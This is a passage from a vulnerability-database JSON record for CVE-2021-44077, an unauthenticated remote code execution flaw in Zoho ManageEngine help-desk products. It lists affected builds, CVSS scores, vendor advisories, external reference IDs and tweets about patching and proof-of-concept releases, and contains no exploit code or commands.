"cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "10.5", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "11.3", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "11.0", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}, {"cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013", "refsource": "MISC", "tags": ["Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"}, {"name": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "refsource": "MISC", "tags": ["Patch", "Vendor Advisory"], "url": "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above"}]}, "lastseen": "2021-12-02T08:36:04", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "modified"], "edition": 3}, {"bulletin": {"id": "CVE-2021-44077", "vendorId": null, "hash": "702544c853b324b1a4b99c6014f024f5", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44077", "description": "Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.", "published": "2021-11-29T04:15:00", "modified": "2021-12-07T17:26:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44077", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-msp-versions-10527-till-10529", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", "https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-supportcenter-plus-versions-11012-and-11013"], "cvelist": ["CVE-2021-44077"], "immutableFields": [], "lastseen": "2021-12-08T08:36:26", "history": [], "viewCount": 102, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB"]}, {"type": "cisa", "idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45", "CISA:72D01121CAFBC56638BC974ABA539CF8"]}, {"type": "threatpost", "idList": ["THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:81CC7A43B010B785FD5977FBA1043E11"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}, {"type": "nessus", "idList": ["MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "THN:60B42277F576BB78A640A9D3B976D8D8"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-08T08:36:26", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "cisa", "idList": ["CISA:DD18BE6DC961451834F7597A6E8AAE45"]}, {"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1"]}], "modified": "2021-12-08T08:36:26"}, "score": {"value": 4.1, "vector": "NONE", "modified": "2021-12-08T08:36:26", "rev": 2}, "twitter": {"counter": 34, "tweets": [{"link": "https://twitter.com/hernanespinoza/status/1468140357674229772", "text": " Have you reviewed /CISAgov and /FBI\u2019s latest released on active /hashtag/APT?src=hashtag_click exploitation of CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus? Review https://t.co/wQZUywIOEB and immediately patch your /hashtag/software?src=hashtag_click to prevent exploitation. \n/hashtag/Cybersecurity?src=hashtag_click /hashtag/In?src=hashtag_click\u2026"}, {"link": "https://twitter.com/CyberSecDN/status/1467442698822946816", "text": "Determined APT is exploiting ManageEngine ServiceDesk Plus vulnerability (CVE-2021-44077) https://t.co/ZCmTGRi95A /hashtag/IT_securitynews?src=hashtag_click"}, {"link": "https://twitter.com/drwareinc/status/1467546845756932103", "text": "APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk\u00a0Plus"}, {"link": "https://twitter.com/Attackerkb_Bot/status/1468667547851829248", "text": "A new /hashtag/attackerkb?src=hashtag_click assesment on 'CVE-2021-44077' has been created by wvu-r7.\nAttacker Value: 5 | Exploitability: 5"}, {"link": "https://twitter.com/Horizon3Attack/status/1468690754964967430", "text": "Another day, another Zoho RCE.\n\nCVE-2021-44077 for /hashtag/ManageEngine?src=hashtag_click ServiceDesk Plus\n\n* PoC: https://t.co/vMKGLAwCwy\n* Research Credit: https://t.co/c95Rmcl0VB"}, {"link": "https://twitter.com/hernanespinoza/status/1468875289338040320", "text": "AA21-336A: APT Actors Exploiting CVE-2021-44077 in Zoho ManageEngine ServiceDesk Plus https://t.co/A85xyBA5SS"}, {"link": "https://twitter.com/buaqbot/status/1468926008317431815", "text": "Exploit for ['CVE-2021-44077'] exploit\n https://t.co/lgiZYbhMRu\nhttps://t.co/zPSS6MArnY"}, {"link": "https://twitter.com/_sSUb__/status/1469109434995847168", "text": "CVE-2021-44077 : PreAuth RCE in ManageEngine ServiceDesk Plus"}, {"link": "https://twitter.com/hack_git/status/1469556617800822785", "text": "CVE-2021-44228: Apache <2.15.0 /hashtag/Log4j?src=hashtag_click RCE\nhttps://t.co/g55CXQndgX\n\nLog4Shell: RCE 0-day exploit found in log4j2,a popular Java logging package\nhttps://t.co/b60NjeJoB1\n\nPoC Exploit for ManageEngine ServiceDesk Plus (CVE-2021-44077)\n\u2026 https://t.co/jvcAALA00t", "author": "hack_git", "author_photo": "https://pbs.twimg.com/profile_images/1430451138277556224/yDiqSjga_400x400.jpg"}, {"link": "https://twitter.com/cKure7/status/1471171643666055173", "text": "\u25a0\u25a0\u25a0\u25a0\u25a1 Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077.", "author": "cKure7", "author_photo": "https://pbs.twimg.com/profile_images/1253998211733360641/YjAE3DV9_400x400.jpg"}], "modified": "2021-12-08T08:36:26"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_supportcenter_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus_msp:10.5", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.2"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10516:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10506:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10527:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11138:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10502:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11302:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10519:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10504:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11304:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10520:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10522:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10503:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11005:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10521:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10525:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10511:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10515:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10528:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10524:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10526:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10523:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10501:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10518:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10509:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10517:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_supportcenter_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11303:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10505:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10529:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus_msp:10.5:10500:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus", "name": "zohocorp manageengine servicedesk plus", "operator": "eq", "version": "11.3"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "le", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "le", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_supportcenter_plus", "name": "zohocorp manageengine supportcenter plus", "operator": "eq", "version": "11.0"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": "zohocorp:manageengine_servicedesk_plus_msp", "name": "zohocorp manageengine servicedesk plus msp", "operator": "eq", "version": "10.5"}, {"cpeName": 